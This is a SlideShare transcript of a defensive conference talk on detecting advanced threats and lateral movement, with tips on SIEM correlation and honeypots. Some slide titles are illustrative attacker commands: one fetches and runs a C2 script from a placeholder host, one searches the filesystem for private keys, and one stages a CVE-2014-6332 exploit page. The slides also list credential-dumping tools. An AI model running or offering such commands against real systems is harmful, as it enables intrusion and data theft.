SlideShare a Scribd company logo
Advanced	
  Threats	
  &	
  Lateral	
  Movement	
  Detec5on	
  
Greg	
  Foss	
  
OSCP,	
  GAWN,	
  GPEN,	
  GWAPT,	
  GCIH,	
  CEH	
  
Sr.	
  Security	
  Research	
  Engineer	
  
LogRhythm	
  Labs	
  
#	
  whoami	
  
•  Greg	
  Foss	
  
•  Sr.	
  Security	
  Researcher	
  
•  LogRhythm	
  Labs	
  –	
  Threat	
  Intel	
  Team	
  
•  Former	
  DOE	
  PenetraEon	
  Tester	
  
•  Focus	
  =>	
  Honeypots,	
  Incident	
  Response,	
  and	
  Red	
  Team	
  
•  OSCP,	
  GAWN,	
  GPEN,	
  GWAPT,	
  GCIH,	
  CEH,	
  etc…	
  
2	
  
#	
  ls	
  -­‐lha	
  
IT	
  Security	
  Threats	
  
Event	
  CorrelaEon	
  
DetecEon	
  
DEMO!	
  
1	
  
2	
  
3	
  
4	
  
3	
  
4	
  
#	
  man	
  [Advanced	
  Threats]	
  
•  Advanced	
  Persistent	
  Threats	
  
•  Organized	
  Cyber	
  Crime	
  
•  Hack5vists	
  
•  ‘Cyber	
  Terrorists’	
  
•  Etc…	
  
•  Able	
  to	
  develop	
  and	
  uElize	
  sophisEcated	
  techniques	
  in	
  pursuit	
  of	
  their	
  target	
  objecEve	
  from	
  
reconnaissance	
  to	
  data	
  exfiltraEon.	
  
•  Will	
  leverage	
  the	
  full	
  spectrum	
  of	
  aWack	
  vectors	
  –	
  social,	
  technical,	
  physical,	
  etc.	
  
•  Highly	
  organized,	
  highly	
  moEvated,	
  highly	
  resourced.	
  	
  	
  
•  Willing	
  to	
  invest	
  significant	
  Eme	
  and	
  resources	
  to	
  compromise.	
  
5	
  
It’s	
  when,	
  not	
  if…	
  
•  Mission	
  Oriented	
  
•  Persistent	
  an	
  Driven	
  
•  PaEent	
  and	
  Methodical	
  
•  Focus	
  on	
  exponenEal	
  ROI	
  
•  Emphasis	
  on	
  high	
  IP	
  value	
  targets	
  
•  They	
  will	
  get	
  in…	
  
6	
   Image:	
  hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg	
  
Iden5fy	
  a	
  ‘Hacker’	
  
7	
  
Ok,	
  for	
  real…	
  
•  *Simple…	
  Correlate	
  on	
  odd	
  network	
  /	
  host	
  ac5vity	
  
•  Use	
  the	
  data	
  at	
  hand	
  to	
  acEvely	
  detect	
  anomalies	
  
•  Understand	
  how	
  your	
  organizaEon	
  will	
  respond	
  to	
  a	
  breach	
  /	
  
outage	
  /	
  squirrel	
  affecEng	
  any	
  of	
  the	
  three	
  InfoSec	
  pillars	
  
	
  
•  Confiden5ality	
  
•  Integrity	
  
•  Availability	
  
8	
  
Advanced	
  Threat	
  Tac5cs	
  and	
  Evasion	
  
•  Threat	
  actors	
  of	
  all	
  types	
  move	
  slowly	
  and	
  quietly	
  over	
  Eme.	
  
LimiEng	
  exposure	
  and	
  potenEal	
  for	
  discovery.	
  
•  Trending	
  on	
  enterprise	
  data	
  over	
  Eme	
  helps	
  to	
  build	
  baselines	
  
that	
  can	
  be	
  used	
  to	
  ac5vely	
  iden5fy	
  anomalies.	
  
9	
  
IT	
  Security	
  Threats	
  
10	
  
#	
  last	
  &&	
  echo	
  ‘How	
  are	
  they	
  geYng	
  in??’	
  
•  Phishing	
  
•  91%	
  of	
  ‘advanced’	
  aWacks	
  began	
  with	
  a	
  phishing	
  email	
  or	
  
similar	
  social	
  engineering	
  tacEcs.	
  
•  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐
start-­‐with-­‐a-­‐spearphishing-­‐email/	
  	
  
•  2014	
  Metrics	
  
•  Average	
  cost	
  per	
  breach	
  =>	
  $3.5	
  million	
  
•  15%	
  Higher	
  than	
  the	
  previous	
  year	
  
•  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐
of-­‐data-­‐breach-­‐global-­‐analysis	
  	
  
11	
  
#	
  last	
  &&	
  echo	
  ‘How	
  are	
  they	
  geYng	
  in??’	
  
•  Phishing	
  
•  91%	
  of	
  ‘advanced’	
  aWacks	
  began	
  with	
  a	
  phishing	
  email	
  or	
  
similar	
  social	
  engineering	
  tacEcs.	
  
•  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐
start-­‐with-­‐a-­‐spearphishing-­‐email/	
  	
  
•  2014	
  Metrics	
  
•  Average	
  cost	
  per	
  breach	
  =>	
  $3.5	
  million	
  
•  15%	
  Higher	
  than	
  the	
  previous	
  year	
  
•  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐
of-­‐data-­‐breach-­‐global-­‐analysis	
  	
  
12	
  
#	
  history	
  |	
  more	
  
•  It	
  only	
  takes	
  one…	
  
13	
  
#	
  ./searchsploit	
  ‘client	
  side’	
  &&	
  echo	
  ‘new	
  exploits	
  daily!’	
  
14	
  
#	
  cat	
  [cve-­‐2014-­‐6332]	
  >>	
  /var/www/pwn-­‐IE.html	
  
15	
  
Event	
  Correla5on	
  &	
  Detec5on	
  
16	
  
Defense	
  in	
  Depth	
  
17	
  
Spear	
  Phishing	
  
18	
  
Phishing	
  Aback	
  Log	
  Traces	
  
19	
  
$	
  vim	
  next.sh	
  
•  Maintain	
  Access…	
  
20	
   Image:	
  hWp://www.netresec.com/images/back_door_open_300x200.png	
  
$	
  ./next.sh	
  
•  Then?	
  
•  *Nothing…	
  
•  For	
  a	
  long	
  Eme…	
  
	
  
•  *not	
  really*	
  
•  They	
  have	
  aWained	
  a	
  foothold	
  and	
  are	
  now	
  your	
  newest	
  employees…	
  
21	
  
$	
  su	
  -­‐	
  root	
  
22	
  
#	
  wget	
  hbp://bad.stuff.net/c2.py	
  .	
  &&	
  ./c2.py	
  
•  Once	
  infected,	
  the	
  beachhead	
  will	
  beacon	
  periodically	
  
23	
  
Behavioral	
  Analy5cs	
  
•  Beaconing	
  Ac5vity	
  –	
  Usually	
  iniEated	
  over	
  port	
  443	
  or	
  an	
  encrypted	
  
tunnel	
  over	
  port	
  80.	
  
•  Can	
  be	
  detected	
  with	
  a	
  Firewall	
  or	
  Web	
  Proxy	
  
•  Capability	
  to	
  decrypt	
  SSL	
  traffic	
  is	
  a	
  huge	
  plus	
  
•  Behavioral	
  analy5cs	
  can	
  be	
  uElized	
  to	
  differenEate	
  normal	
  browsing	
  
acEvity	
  from	
  possible	
  evidence	
  of	
  an	
  infected	
  host.	
  
•  Using	
  a	
  SIEM,	
  track	
  the	
  unique	
  websites	
  usually	
  visited,	
  and	
  the	
  overall	
  
volume	
  of	
  normal	
  web	
  acEvity,	
  on	
  a	
  per	
  user	
  and	
  a	
  per	
  host	
  basis.	
  
•  Watch	
  for	
  significant	
  changes	
  over	
  an	
  extended	
  period	
  of	
  Eme.	
  
24	
  
Reconnaissance	
  
•  Ping	
  sweeps,	
  service	
  discovery,	
  etc.	
  –	
  NO	
  
•  Why	
  make	
  unnecessary	
  noise?	
  
•  Instead	
  =>	
  access	
  network	
  shares,	
  web	
  apps,	
  and	
  services	
  
•  Passively	
  gather	
  informaEon	
  using	
  available	
  resources…	
  
25	
   Image:	
  hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png	
  
Lateral	
  Movement	
  
•  Dump	
  Local	
  System	
  Hashes	
  
•  Maybe	
  crack	
  them,	
  maybe	
  it’s	
  not	
  even	
  necessary…	
  
•  Pass	
  the	
  Hash	
  (PtH)	
  
•  Dump	
  plain	
  text	
  passwords	
  
•  Mimikatz	
  -­‐-­‐	
  FTW!	
  
•  Act	
  as	
  an	
  internal	
  employee	
  -­‐-­‐	
  use	
  legiEmate	
  means	
  to	
  access	
  
resources.	
  
26	
  
Uncovering	
  Internal	
  Reconnaissance	
  and	
  Pivo5ng	
  
•  Security	
  OperaEons	
  Goal	
  =>	
  Reduce	
  MTTD	
  and	
  MTTR	
  
•  MTTD	
  –	
  Mean	
  Time	
  to	
  Detect	
  
•  MTTR	
  –	
  Mean	
  Time	
  to	
  Respond	
  
•  Set	
  Traps	
  =>	
  Honeypot	
  /	
  Honey	
  Token	
  access	
  
•  Overt	
  Clues	
  =>	
  ModificaEon	
  of	
  user	
  /	
  file	
  /	
  group	
  permissions	
  and	
  
pivoEng	
  evidence	
  
•  Subtle	
  Clues	
  =>	
  VPN	
  access	
  from	
  disparate	
  geographical	
  locaEons	
  
•  Missed	
  Opportuni5es	
  =>	
  Once	
  inside,	
  they	
  are	
  now	
  an	
  ‘employee’…	
  
27	
  
Lateral	
  Movement	
  Log	
  Traces	
  
•  Microsos’s	
  granular	
  Event	
  IdenEficaEon	
  schema	
  (EVID)	
  in	
  
conjuncEon	
  with	
  environment	
  informaEon	
  provides	
  analysts	
  
with	
  plenty	
  of	
  informaEon	
  to	
  track	
  aWackers	
  once	
  they	
  have	
  
breached	
  the	
  perimeter.	
  
28	
  
Passive	
  Data	
  Extrac5on	
  
•  Well	
  Poisoning	
  via	
  UNC	
  Paths	
  
•  SMB	
  Replay	
  
•  Help	
  Desk	
  Tickets	
  
•  Responder	
  –	
  By	
  Spider	
  Labs	
  
•  Keylogging	
  
29	
  
Passive	
  Traffic	
  Analysis	
  
•  Analyze	
  /	
  capture	
  anything	
  
that	
  comes	
  across	
  the	
  wire.	
  
•  ARP	
  poison	
  hosts	
  of	
  interest,	
  
take	
  over	
  switches/routers,	
  
etc.	
  
30	
   Image:	
  hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/	
  
#	
  grep	
  –rhi	
  ‘private	
  key’	
  /*	
  &&	
  echo	
  “Iden5fy	
  Key	
  Resources”	
  
•  Keys	
  /	
  CerEficates	
  /	
  Passwords	
  
	
  
•  File	
  Shares	
  and	
  Databases	
  
•  Intellectual	
  Property	
  
•  Domain	
  Controllers	
  /	
  Exchange	
  /	
  etc.	
  
•  Business	
  Leaders	
  –	
  CXO,	
  Director,	
  VP,	
  etc.	
  	
  
•  AdministraEve	
  Assistants	
  
31	
  
Image:	
  hWp://www.mobilemarkeEngwatch.com/wordpress/wp-­‐content/uploads/2011/07/Top-­‐Secret-­‐Tip-­‐To-­‐Pick-­‐SMS-­‐Keyword.jpeg	
  
#	
  wget	
  hbp://target/files.tgz	
  &&	
  echo	
  “Data	
  Exfiltra5on”	
  
•  Target	
  data	
  idenEfied,	
  gathered,	
  and	
  moved	
  out	
  of	
  the	
  environment.	
  
•  Data	
  is	
  normally	
  leaked	
  in	
  a	
  ‘hidden’	
  or	
  modified	
  format,	
  rarely	
  is	
  the	
  
actual	
  document	
  extracted.	
  
•  Emails	
  and	
  Employee	
  PII	
  
•  Intellectual	
  Property	
  
•  Trade	
  Secrets	
  
32	
  
Image:	
  hWp://www.csee.umbc.edu/wp-­‐content/uploads/2013/04/ex.jpg	
  
Data	
  Exfiltra5on	
  is	
  Open	
  Not	
  ‘Advanced’	
  
33	
  
Catching	
  Data	
  Exfiltra5on	
  
•  Granular	
  restric5ons	
  on	
  sensi5ve	
  files	
  and	
  directories	
  to	
  specific	
  
groups	
  or	
  individuals,	
  alert	
  on	
  any	
  abnormal	
  file	
  access	
  /	
  read	
  /	
  
write	
  /	
  etc.	
  	
  
•  DNS	
  exfiltra5on	
  or	
  someEmes	
  even	
  ICMP	
  Tunneling	
  in	
  high	
  security	
  
environments	
  
	
  
•  Non-­‐SSL	
  over	
  ports	
  443	
  /	
  8443,	
  encrypted	
  TCP	
  over	
  ports	
  80	
  /	
  8080	
  
•  Abnormal	
  web	
  server	
  ac5vity,	
  newly	
  created	
  files,	
  etc.	
  
34	
  
It	
  all	
  comes	
  down	
  to	
  Event	
  Correla5on	
  
35	
  
DEMO	
  
36	
  
DEMO	
  
Closing	
  Thoughts…	
  
•  Don’t	
  be	
  hard	
  on	
  the	
  outside,	
  sos	
  and	
  chewy	
  on	
  the	
  inside…	
  
•  Implement	
  Layer	
  3	
  (network)	
  SegmentaEon	
  and	
  Least	
  User	
  Privilege	
  
•  Understand	
  your	
  environment	
  and	
  log	
  data	
  so	
  that	
  you	
  can	
  accurately	
  
correlate	
  physical	
  and	
  cyber	
  events	
  
•  Implement	
  URL	
  filtering,	
  stateful	
  packet	
  inspecEon,	
  and	
  binary	
  analysis	
  
•  AcEvely	
  alert	
  on	
  and	
  respond	
  at	
  the	
  earliest	
  signs	
  of	
  lateral	
  movement	
  and	
  
reconnaissance	
  observed	
  within	
  your	
  environment	
  
•  The	
  earlier	
  you	
  can	
  detect	
  aWackers	
  the	
  beWer…	
  
37	
  
Thank	
  You!	
  
38	
  
	
  
QUESTIONS?	
  
	
  
Greg	
  Foss	
  
OSCP,	
  GAWN,	
  GPEN,	
  GWAPT,	
  GCIH,	
  CEH	
  
Senior	
  Security	
  Research	
  Engineer	
  
Greg.Foss[at]logrhythm.com	
  
@heinzarelli	
  

More Related Content

PPTX
Lateral Movement by Default
PDF
DerbyCon 5 - Tactical Diversion-Driven Defense
PDF
Deception Driven Defense - Infragard 2016
PPTX
Threat hunting - Every day is hunting season
PPTX
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
PPTX
My Keynote from BSidesTampa 2015 (video in description)
PPTX
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
PPTX
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Lateral Movement by Default
DerbyCon 5 - Tactical Diversion-Driven Defense
Deception Driven Defense - Infragard 2016
Threat hunting - Every day is hunting season
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
My Keynote from BSidesTampa 2015 (video in description)
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016

What's hot (20)

PDF
Hunting: Defense Against The Dark Arts
PDF
Avoiding the Pitfalls of Hunting - BSides Charm 2016
PPTX
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
PDF
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
PPTX
Bsides 2019 - Intelligent Threat Hunting
PDF
Threat Hunting
PPTX
GreyNoise - Lowering Signal To Noise
PPT
Introduction to Malware - Part 1
PDF
TTPs for Threat hunting In Oil Refineries
PDF
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
PDF
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
PPTX
Cyber Threat Hunting Training (CCTHP)
PPTX
Red team Engagement
PDF
Threat Hunting Report
PDF
How to Hunt for Lateral Movement on Your Network
PDF
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
PPTX
Jim Wojno: Incident Response - No Pain, No Gain!
PPTX
How to Build a Successful Incident Response Program
PPTX
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
PDF
Ransomware ly
Hunting: Defense Against The Dark Arts
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Bsides 2019 - Intelligent Threat Hunting
Threat Hunting
GreyNoise - Lowering Signal To Noise
Introduction to Malware - Part 1
TTPs for Threat hunting In Oil Refineries
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
Cyber Threat Hunting Training (CCTHP)
Red team Engagement
Threat Hunting Report
How to Hunt for Lateral Movement on Your Network
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
Jim Wojno: Incident Response - No Pain, No Gain!
How to Build a Successful Incident Response Program
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Ransomware ly
Ad

Viewers also liked (20)

PDF
RTOS on ARM cortex-M platform -draft
PDF
Hunting Lateral Movement in Windows Infrastructure
PDF
Two-fet based PUF
PDF
Dakotacon 2017
PDF
Ubuntu 16.04 LTS Security Features
PDF
Трудовые будни охотника на угрозы
PPTX
Whitewood entropy and random numbers - owasp - austin - jan 2017
PDF
Threat hunting as SOC process
PDF
Deploying Privileged Access Workstations (PAWs)
PDF
Terra Bruciata: an open source initiative for software correctness
PDF
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PPTX
Io t security-ameba-ppt
PDF
Threat Intelligence Field of Dreams
PDF
Generalized Elias Schemes for Truly Random Bits
PDF
A Threat Hunter Himself
PDF
Rtos ameba
PDF
Kaspersky managed protection
PDF
Very stable PUF based on two mosfet
PDF
A Very Stable Diode-Based Physically Unclonable Constant
PDF
Physically Unclonable Random Permutations
RTOS on ARM cortex-M platform -draft
Hunting Lateral Movement in Windows Infrastructure
Two-fet based PUF
Dakotacon 2017
Ubuntu 16.04 LTS Security Features
Трудовые будни охотника на угрозы
Whitewood entropy and random numbers - owasp - austin - jan 2017
Threat hunting as SOC process
Deploying Privileged Access Workstations (PAWs)
Terra Bruciata: an open source initiative for software correctness
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
Io t security-ameba-ppt
Threat Intelligence Field of Dreams
Generalized Elias Schemes for Truly Random Bits
A Threat Hunter Himself
Rtos ameba
Kaspersky managed protection
Very stable PUF based on two mosfet
A Very Stable Diode-Based Physically Unclonable Constant
Physically Unclonable Random Permutations
Ad

Similar to Advanced Threats and Lateral Movement Detection (20)

PPTX
Intrusion detection system
PDF
Preventing The Next Data Breach Through Log Management
PPTX
Insider Threat
PDF
Cyber Defense - How to be prepared to APT
PPT
Port of seattle security presentation david morris
PDF
SplunkLive! Amsterdam 2015 - Analytics based security breakout
PDF
cybersecurity-careers.pdf
PPTX
So You Want a Job in Cybersecurity
PPTX
Advanced Persistent Threats (APTs) - Information Security Management
PDF
SplunkLive! Stockholm 2015 breakout - Analytics based security
PPT
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
PDF
Enabling effective hunt teaming and incident response
PDF
The Threat Landscape & Network Security Measures
PDF
5 attack vectors behind 3000+ breaches.pdf
PDF
2023 NCIT: Introduction to Intrusion Detection
PPTX
Cyber-Espionage: Understanding the Advanced Threat Landscape
PPTX
Vulenerability Management.pptx
PDF
RSA: Security Analytics Architecture for APT
PPTX
Understanding advanced persistent threats (APT)
PPTX
Vulnerability Management
Intrusion detection system
Preventing The Next Data Breach Through Log Management
Insider Threat
Cyber Defense - How to be prepared to APT
Port of seattle security presentation david morris
SplunkLive! Amsterdam 2015 - Analytics based security breakout
cybersecurity-careers.pdf
So You Want a Job in Cybersecurity
Advanced Persistent Threats (APTs) - Information Security Management
SplunkLive! Stockholm 2015 breakout - Analytics based security
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
Enabling effective hunt teaming and incident response
The Threat Landscape & Network Security Measures
5 attack vectors behind 3000+ breaches.pdf
2023 NCIT: Introduction to Intrusion Detection
Cyber-Espionage: Understanding the Advanced Threat Landscape
Vulenerability Management.pptx
RSA: Security Analytics Architecture for APT
Understanding advanced persistent threats (APT)
Vulnerability Management

More from Greg Foss (12)

PPTX
Cloud Crime Ops
PPTX
Future of Destructive Malware
PDF
Crypto Hacks - Quit your Job and Become a Crypto Farmer
PDF
PIE - BSides Vancouver 2018
PDF
Phishing Intelligence Engine - BlueHat v17
PDF
Security Automation and Orchestration
PDF
Activated Charcoal - Making Sense of Endpoint Data
PDF
SecureSet WarGames - Logging and Packet Capture Training
PDF
Honeypots for Active Defense
PDF
Wi-Fi Hotspot Attacks
PDF
CMS Hacking Tricks - DerbyCon 4 - 2014
PDF
Attacking Drupal
Cloud Crime Ops
Future of Destructive Malware
Crypto Hacks - Quit your Job and Become a Crypto Farmer
PIE - BSides Vancouver 2018
Phishing Intelligence Engine - BlueHat v17
Security Automation and Orchestration
Activated Charcoal - Making Sense of Endpoint Data
SecureSet WarGames - Logging and Packet Capture Training
Honeypots for Active Defense
Wi-Fi Hotspot Attacks
CMS Hacking Tricks - DerbyCon 4 - 2014
Attacking Drupal

Recently uploaded (20)

PDF
cuic standard and advanced reporting.pdf
PDF
Review of recent advances in non-invasive hemoglobin estimation
PPT
Teaching material agriculture food technology
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
NewMind AI Weekly Chronicles - August'25 Week I
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PDF
Network Security Unit 5.pdf for BCA BBA.
PPTX
Cloud computing and distributed systems.
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Modernizing your data center with Dell and AMD
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
PDF
NewMind AI Monthly Chronicles - July 2025
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
MYSQL Presentation for SQL database connectivity
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PDF
Encapsulation theory and applications.pdf
cuic standard and advanced reporting.pdf
Review of recent advances in non-invasive hemoglobin estimation
Teaching material agriculture food technology
20250228 LYD VKU AI Blended-Learning.pptx
NewMind AI Weekly Chronicles - August'25 Week I
Diabetes mellitus diagnosis method based random forest with bat algorithm
Network Security Unit 5.pdf for BCA BBA.
Cloud computing and distributed systems.
Advanced methodologies resolving dimensionality complications for autism neur...
Chapter 3 Spatial Domain Image Processing.pdf
Modernizing your data center with Dell and AMD
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
NewMind AI Monthly Chronicles - July 2025
Mobile App Security Testing_ A Comprehensive Guide.pdf
MYSQL Presentation for SQL database connectivity
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
Per capita expenditure prediction using model stacking based on satellite ima...
Dropbox Q2 2025 Financial Results & Investor Presentation
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Encapsulation theory and applications.pdf

Advanced Threats and Lateral Movement Detection

  • 1. Advanced  Threats  &  Lateral  Movement  Detec5on   Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Sr.  Security  Research  Engineer   LogRhythm  Labs  
  • 2. #  whoami   •  Greg  Foss   •  Sr.  Security  Researcher   •  LogRhythm  Labs  –  Threat  Intel  Team   •  Former  DOE  PenetraEon  Tester   •  Focus  =>  Honeypots,  Incident  Response,  and  Red  Team   •  OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH,  etc…   2  
  • 3. #  ls  -­‐lha   IT  Security  Threats   Event  CorrelaEon   DetecEon   DEMO!   1   2   3   4   3  
  • 5. #  man  [Advanced  Threats]   •  Advanced  Persistent  Threats   •  Organized  Cyber  Crime   •  Hack5vists   •  ‘Cyber  Terrorists’   •  Etc…   •  Able  to  develop  and  uElize  sophisEcated  techniques  in  pursuit  of  their  target  objecEve  from   reconnaissance  to  data  exfiltraEon.   •  Will  leverage  the  full  spectrum  of  aWack  vectors  –  social,  technical,  physical,  etc.   •  Highly  organized,  highly  moEvated,  highly  resourced.       •  Willing  to  invest  significant  Eme  and  resources  to  compromise.   5  
  • 6. It’s  when,  not  if…   •  Mission  Oriented   •  Persistent  an  Driven   •  PaEent  and  Methodical   •  Focus  on  exponenEal  ROI   •  Emphasis  on  high  IP  value  targets   •  They  will  get  in…   6   Image:  hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg  
  • 8. Ok,  for  real…   •  *Simple…  Correlate  on  odd  network  /  host  ac5vity   •  Use  the  data  at  hand  to  acEvely  detect  anomalies   •  Understand  how  your  organizaEon  will  respond  to  a  breach  /   outage  /  squirrel  affecEng  any  of  the  three  InfoSec  pillars     •  Confiden5ality   •  Integrity   •  Availability   8  
  • 9. Advanced  Threat  Tac5cs  and  Evasion   •  Threat  actors  of  all  types  move  slowly  and  quietly  over  Eme.   LimiEng  exposure  and  potenEal  for  discovery.   •  Trending  on  enterprise  data  over  Eme  helps  to  build  baselines   that  can  be  used  to  ac5vely  iden5fy  anomalies.   9  
  • 11. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     11  
  • 12. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     12  
  • 13. #  history  |  more   •  It  only  takes  one…   13  
  • 14. #  ./searchsploit  ‘client  side’  &&  echo  ‘new  exploits  daily!’   14  
  • 15. #  cat  [cve-­‐2014-­‐6332]  >>  /var/www/pwn-­‐IE.html   15  
  • 16. Event  Correla5on  &  Detec5on   16  
  • 19. Phishing  Aback  Log  Traces   19  
  • 20. $  vim  next.sh   •  Maintain  Access…   20   Image:  hWp://www.netresec.com/images/back_door_open_300x200.png  
  • 21. $  ./next.sh   •  Then?   •  *Nothing…   •  For  a  long  Eme…     •  *not  really*   •  They  have  aWained  a  foothold  and  are  now  your  newest  employees…   21  
  • 22. $  su  -­‐  root   22  
  • 23. #  wget  hbp://bad.stuff.net/c2.py  .  &&  ./c2.py   •  Once  infected,  the  beachhead  will  beacon  periodically   23  
  • 24. Behavioral  Analy5cs   •  Beaconing  Ac5vity  –  Usually  iniEated  over  port  443  or  an  encrypted   tunnel  over  port  80.   •  Can  be  detected  with  a  Firewall  or  Web  Proxy   •  Capability  to  decrypt  SSL  traffic  is  a  huge  plus   •  Behavioral  analy5cs  can  be  uElized  to  differenEate  normal  browsing   acEvity  from  possible  evidence  of  an  infected  host.   •  Using  a  SIEM,  track  the  unique  websites  usually  visited,  and  the  overall   volume  of  normal  web  acEvity,  on  a  per  user  and  a  per  host  basis.   •  Watch  for  significant  changes  over  an  extended  period  of  Eme.   24  
  • 25. Reconnaissance   •  Ping  sweeps,  service  discovery,  etc.  –  NO   •  Why  make  unnecessary  noise?   •  Instead  =>  access  network  shares,  web  apps,  and  services   •  Passively  gather  informaEon  using  available  resources…   25   Image:  hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png  
  • 26. Lateral  Movement   •  Dump  Local  System  Hashes   •  Maybe  crack  them,  maybe  it’s  not  even  necessary…   •  Pass  the  Hash  (PtH)   •  Dump  plain  text  passwords   •  Mimikatz  -­‐-­‐  FTW!   •  Act  as  an  internal  employee  -­‐-­‐  use  legiEmate  means  to  access   resources.   26  
  • 27. Uncovering  Internal  Reconnaissance  and  Pivo5ng   •  Security  OperaEons  Goal  =>  Reduce  MTTD  and  MTTR   •  MTTD  –  Mean  Time  to  Detect   •  MTTR  –  Mean  Time  to  Respond   •  Set  Traps  =>  Honeypot  /  Honey  Token  access   •  Overt  Clues  =>  ModificaEon  of  user  /  file  /  group  permissions  and   pivoEng  evidence   •  Subtle  Clues  =>  VPN  access  from  disparate  geographical  locaEons   •  Missed  Opportuni5es  =>  Once  inside,  they  are  now  an  ‘employee’…   27  
  • 28. Lateral  Movement  Log  Traces   •  Microsos’s  granular  Event  IdenEficaEon  schema  (EVID)  in   conjuncEon  with  environment  informaEon  provides  analysts   with  plenty  of  informaEon  to  track  aWackers  once  they  have   breached  the  perimeter.   28  
  • 29. Passive  Data  Extrac5on   •  Well  Poisoning  via  UNC  Paths   •  SMB  Replay   •  Help  Desk  Tickets   •  Responder  –  By  Spider  Labs   •  Keylogging   29  
  • 30. Passive  Traffic  Analysis   •  Analyze  /  capture  anything   that  comes  across  the  wire.   •  ARP  poison  hosts  of  interest,   take  over  switches/routers,   etc.   30   Image:  hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/  
  • 31. #  grep  –rhi  ‘private  key’  /*  &&  echo  “Iden5fy  Key  Resources”   •  Keys  /  CerEficates  /  Passwords     •  File  Shares  and  Databases   •  Intellectual  Property   •  Domain  Controllers  /  Exchange  /  etc.   •  Business  Leaders  –  CXO,  Director,  VP,  etc.     •  AdministraEve  Assistants   31   Image:  hWp://www.mobilemarkeEngwatch.com/wordpress/wp-­‐content/uploads/2011/07/Top-­‐Secret-­‐Tip-­‐To-­‐Pick-­‐SMS-­‐Keyword.jpeg  
  • 32. #  wget  hbp://target/files.tgz  &&  echo  “Data  Exfiltra5on”   •  Target  data  idenEfied,  gathered,  and  moved  out  of  the  environment.   •  Data  is  normally  leaked  in  a  ‘hidden’  or  modified  format,  rarely  is  the   actual  document  extracted.   •  Emails  and  Employee  PII   •  Intellectual  Property   •  Trade  Secrets   32   Image:  hWp://www.csee.umbc.edu/wp-­‐content/uploads/2013/04/ex.jpg  
  • 33. Data  Exfiltra5on  is  Open  Not  ‘Advanced’   33  
